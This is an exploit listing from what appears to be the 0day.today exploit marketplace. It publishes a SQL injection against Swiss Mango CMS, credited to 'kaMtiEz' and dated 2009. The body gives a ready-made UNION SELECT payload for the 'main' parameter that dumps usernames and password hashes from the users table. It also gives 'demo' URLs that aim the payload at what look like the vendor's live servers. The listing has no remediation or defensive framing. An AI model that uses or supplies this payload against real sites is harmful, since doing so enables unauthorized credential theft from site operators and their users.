[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Swiss Mango CMS SQL Injection

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9862
Category
web applications
Date add
24-09-2009
Platform
unsorted
=============================
Swiss Mango CMS SQL Injection
=============================

#############################################################################################################
# Hello My Name Is :                                                                                       ##
#  __               _____   __  ._____________                                                             ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                      ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                      ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                       ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                      ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-             ##
#############################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://dev.swissmango.com/
[+] Download : http://dev.swissmango.com/
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : -
[+] Location : INDONESIA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?main=[INDONESIANCODER]
 
[ Exploit ]
 
666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--
 
[ Demo ]
 
http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--
 
http://cms.swissmango.com/demos/business/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--
 
[NB] : u can see in the login and password hash in error mode ;P
 
#############################################################################################################
 


#  0day.today [2024-12-25]  #